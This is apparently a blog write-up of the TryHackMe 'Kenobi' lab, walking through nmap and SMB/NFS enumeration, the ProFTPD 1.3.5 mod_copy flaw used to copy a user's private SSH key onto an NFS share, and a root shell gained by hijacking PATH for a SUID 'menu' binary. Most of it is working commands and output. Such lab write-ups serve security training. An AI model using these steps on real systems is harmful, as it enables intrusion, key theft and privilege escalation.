TryHackMe - Kenobi

[Task 1] Deploy the vulnerable machine

  • Setup bash evironment variable

    export IP=KENOBI-IP
    

    NOTE: where KENOBI-IP is shown throughout this writeup, this refers to the TryHackMe server IP.

  • Make sure there is a connection to the THM network

    ping $IP -c 3
    
    PING KENOBI-IP (KENOBI-IP) 56(84) bytes of data.
    64 bytes from KENOBI-IP: icmp_seq=1 ttl=63 time=43.3 ms
    64 bytes from KENOBI-IP: icmp_seq=2 ttl=63 time=43.9 ms
    64 bytes from KENOBI-IP: icmp_seq=3 ttl=63 time=43.1 ms
    
    --- KENOBI-IP ping statistics ---
    3 packets transmitted, 3 received, 0% packet loss, time 2003ms
    rtt min/avg/max/mdev = 43.110/43.424/43.878/0.328 ms
    
  • Scan the machine with nmap

    nmap -sC -sV -vvv -oA $PWD/portScan/nmap-initial $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:38 EDT
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Initiating Ping Scan at 18:38
    Scanning KENOBI-IP [2 ports]
    Completed Ping Scan at 18:38, 0.04s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 18:38
    Completed Parallel DNS resolution of 1 host. at 18:38, 0.01s elapsed
    DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
    Initiating Connect Scan at 18:38
    Scanning KENOBI-IP [1000 ports]
    Discovered open port 21/tcp on KENOBI-IP
    Discovered open port 80/tcp on KENOBI-IP
    Discovered open port 139/tcp on KENOBI-IP
    Discovered open port 111/tcp on KENOBI-IP
    Discovered open port 22/tcp on KENOBI-IP
    Discovered open port 445/tcp on KENOBI-IP
    Discovered open port 2049/tcp on KENOBI-IP
    Completed Connect Scan at 18:38, 0.67s elapsed (1000 total ports)
    Initiating Service scan at 18:38
    Scanning 7 services on KENOBI-IP
    Completed Service scan at 18:38, 11.15s elapsed (7 services on 1 host)
    NSE: Script scanning KENOBI-IP.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 1.99s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.23s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Nmap scan report for KENOBI-IP
    Host is up, received syn-ack (0.044s latency).
    Scanned at 2020-05-09 18:38:16 EDT for 14s
    Not shown: 993 closed ports
    Reason: 993 conn-refused
    PORT     STATE SERVICE     REASON  VERSION
    21/tcp   open  ftp         syn-ack ProFTPD 1.3.5
    22/tcp   open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
    |   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
    |   256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
    80/tcp   open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
    | http-methods:
    |_  Supported Methods: POST OPTIONS GET HEAD
    | http-robots.txt: 1 disallowed entry
    |_/admin.html
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp  open  rpcbind     syn-ack 2-4 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100003  2,3,4       2049/udp6  nfs
    |   100005  1,2,3      34097/tcp   mountd
    |   100005  1,2,3      42895/udp6  mountd
    |   100005  1,2,3      49712/udp   mountd
    |   100005  1,2,3      54641/tcp6  mountd
    |   100021  1,3,4      38881/tcp   nlockmgr
    |   100021  1,3,4      42051/tcp6  nlockmgr
    |   100021  1,3,4      52158/udp   nlockmgr
    |   100021  1,3,4      59194/udp6  nlockmgr
    |   100227  2,3         2049/tcp   nfs_acl
    |   100227  2,3         2049/tcp6  nfs_acl
    |   100227  2,3         2049/udp   nfs_acl
    |_  100227  2,3         2049/udp6  nfs_acl
    139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    2049/tcp open  nfs_acl     syn-ack 2-3 (RPC #100227)
    Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
    |_clock-skew: mean: 9h38m02s, deviation: 2h53m12s, median: 7h58m01s
    | nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | Names:
    |   KENOBI<00>           Flags: <unique><active>
    |   KENOBI<03>           Flags: <unique><active>
    |   KENOBI<20>           Flags: <unique><active>
    |   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
    |   WORKGROUP<00>        Flags: <group><active>
    |   WORKGROUP<1d>        Flags: <unique><active>
    |   WORKGROUP<1e>        Flags: <group><active>
    | Statistics:
    |   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    |   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    |_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
    | p2p-conficker:
    |   Checking for Conficker.C or higher...
    |   Check 1 (port 33364/tcp): CLEAN (Couldn't connect)
    |   Check 2 (port 63681/tcp): CLEAN (Couldn't connect)
    |   Check 3 (port 58242/udp): CLEAN (Failed to receive data)
    |   Check 4 (port 4291/udp): CLEAN (Failed to receive data)
    |_  0/4 checks are positive: Host is CLEAN or ports are blocked
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: kenobi
    |   NetBIOS computer name: KENOBI\x00
    |   Domain name: \x00
    |   FQDN: kenobi
    |_  System time: 2020-05-10T01:36:31-05:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-05-10T06:36:31
    |_  start_date: N/A
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
    

    Answer = 8

[Task 2] Enumerating Samba for shares

  • Use nmap to enumerate a machine for SMB shares

    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:40 EDT
    Nmap scan report for KENOBI-IP
    Host is up (0.042s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares:
    |   account_used: guest
    |   \\KENOBI-IP\IPC$:
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: <unlimited>
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\KENOBI-IP\anonymous:
    |     Type: STYPE_DISKTREE
    |     Comment:
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\home\kenobi\share
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\KENOBI-IP\print$:
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: <none>
    |_    Current user access: <none>
    |_smb-enum-users: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds
    

    How many shares have been found?

    Answer = 3

  • List files within the SMB directory

    smbclient //KENOBI-IP/anonymous
    Enter WORKGROUP\c0g's password:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Sep  4 06:49:09 2019
      ..                                  D        0  Wed Sep  4 06:56:07 2019
      log.txt                             N    12237  Wed Sep  4 06:49:09 2019
    
                    9204224 blocks of size 1024. 6877104 blocks available
    

    Answer = log.txt

  • Recursively download the SMB share.

    smbget -R smb://KENOBI-IP/anonymous
    Password for [c0g] connecting to //anonymous/KENOBI-IP:
    Using workgroup WORKGROUP, user c0g
    smb://KENOBI-IP/anonymous/log.txt
    
    Downloaded 11.95kB in 3 seconds
     cat log.txt | grep port
    # Port 21 is the standard FTP port.
    # Don't use IPv6 support by default.
    #    behaviour of Samba but the option is considered important
    # Windows Internet Name Serving Support Section:
    # WINS Support - Tells the NMBD component of Samba to enable its WINS Server
    #   wins support = no
    # By default, the home directories are exported read-only. Change the
    

    What port is FTP running on? Answer = 21

  • Enumerate nfs share on port 111

    nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 21:34 EDT
    Nmap scan report for KENOBI-IP
    Host is up (0.042s latency).
    
    PORT    STATE SERVICE
    111/tcp open  rpcbind
    | nfs-showmount:
    |_  /var *
    
    Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
    

    What mount can we see?

    Answer = /var

[Task 3] Gain initial access with ProFTPD

  • Use netcat to connect to the machine on the FTP port.

    netcat KENOBI-IP 21
    220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP ]
    
  • Use searchsploit to find exploits for ProFTD

    searchsploit ProFTPD 1.3.5
    
    ---------------------------------------------- ---------------------------------
     Exploit Title                                |  Path
    ---------------------------------------------- ---------------------------------
    ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
    ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
    ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
    ---------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results
    

    What is the version? 1.3.5

  • Copy Kenobi's private key using SITE CPFR and SITE CPTO commands.

    220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP]
    350 File or directory exists, ready for destination name
    250 Copy successful
    

    The /var directory was a mount previously seen; therefore, Kenobi's private key can be moved to /var/tmp.

  • Mount the /var/tmp directory to the attacking machine

    sudo mkdir /mnt/kenobiNFS
    sudo mount KENOBI-IP:/var /mnt/kenobiNFS/
    ls -la /mnt/kenobiNFS/
    total 56
    drwxr-xr-x  14 root           root     4096 2019-09-04  2019 .
    drwxr-xr-x   3 root           root     4096 2020-05-09 22:06 ..
    drwxr-xr-x   2 root           root     4096 2019-09-04  2019 backups
    drwxr-xr-x   9 root           root     4096 2019-09-04  2019 cache
    drwxrwxrwt   2 root           root     4096 2019-09-04  2019 crash
    drwxr-xr-x  40 root           root     4096 2019-09-04  2019 lib
    drwxrwsr-x   2 root           staff    4096 2016-04-12  2016 local
    lrwxrwxrwx   1 root           root        9 2019-09-04  2019 lock -> /run/lock
    drwxrwxr-x  10 root           crontab  4096 2019-09-04  2019 log
    drwxrwsr-x   2 root           mail     4096 2019-02-26  2019 mail
    drwxr-xr-x   2 root           root     4096 2019-02-26  2019 opt
    lrwxrwxrwx   1 root           root        4 2019-09-04  2019 run -> /run
    drwxr-xr-x   2 root           root     4096 2019-01-29  2019 snap
    drwxr-xr-x   5 root           root     4096 2019-09-04  2019 spool
    drwxrwxrwt   6 root           root     4096 2020-05-10 05:49 tmp
    drwxr-xr-x   3 root           root     4096 2019-09-04  2019 www
    
  • Go to /var/tmp and get the private key to login into Kenobi's account

    cp /mnt/kenobiNFS/tmp/id_rsa .
    
    sudo chmod 600 id_rsa
    [sudo] password for c0g:
    
    ssh -i id_rsa kenobi@KENOBI-IP
    Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    103 packages can be updated.
    65 updates are security updates.
    
    Last login: Sun May 10 05:18:41 2020 from 10.11.1.193
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.
    
    cat /home/kenobi/user.txt | wc -c
    33
    

[Task 4] Privilege Escalation with Path Variable Manipulation

  • Search the system for SUID type files

    kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
    /sbin/mount.nfs
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/bin/chfn
    /usr/bin/newgidmap
    /usr/bin/pkexec
    /usr/bin/passwd
    /usr/bin/newuidmap
    /usr/bin/gpasswd
    /usr/bin/menu
    /usr/bin/sudo
    /usr/bin/chsh
    /usr/bin/at
    /usr/bin/newgrp
    /bin/umount
    /bin/fusermount
    /bin/mount
    /bin/ping
    /bin/su
    /bin/ping6
    kenobi@kenobi:~$
    

What file looks particularly out of the ordinary?

Answer = /usr/bin/menu

  • Run the binary

    kenobi@kenobi:~$ menu
    
    ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     Enter your choice :
    

How many options appear? Answer = 3

  • Use strings to look for anything human readable within the binary

    kenobi@kenobi:~$ strings /usr/bin/menu
    /lib64/ld-linux-x86-64.so.2
    libc.so.6
    setuid
    __isoc99_scanf
    puts
    __stack_chk_fail
    printf
    system
    __libc_start_main
    __gmon_start__
    GLIBC_2.7
    GLIBC_2.4
    GLIBC_2.2.5
    UH-
    AWAVA
    AUATL
    []A\A]A^A_
     ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     ** Enter your choice :
    curl -I localhost
    uname -r
    ifconfig
    .........
    output shortened
    

    This shows the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).

    As this file runs as the root users privileges, the environment path can be changed to gain a root shell.

    kenobi@kenobi:~$ cd /tmp
    kenobi@kenobi:/tmp$ echo /bin/sh > curl
    kenobi@kenobi:/tmp$ chmod 777 curl
    kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
    kenobi@kenobi:/tmp$ /usr/bin/menu
    
     ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     ** Enter your choice :1
    # id
    uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
    kenobi@kenobi:/tmp$ cat /root/root.txt | wc -c
    33
    

You'll only receive email when BreakBeforeMake publishes a new post

More from BreakBeforeMake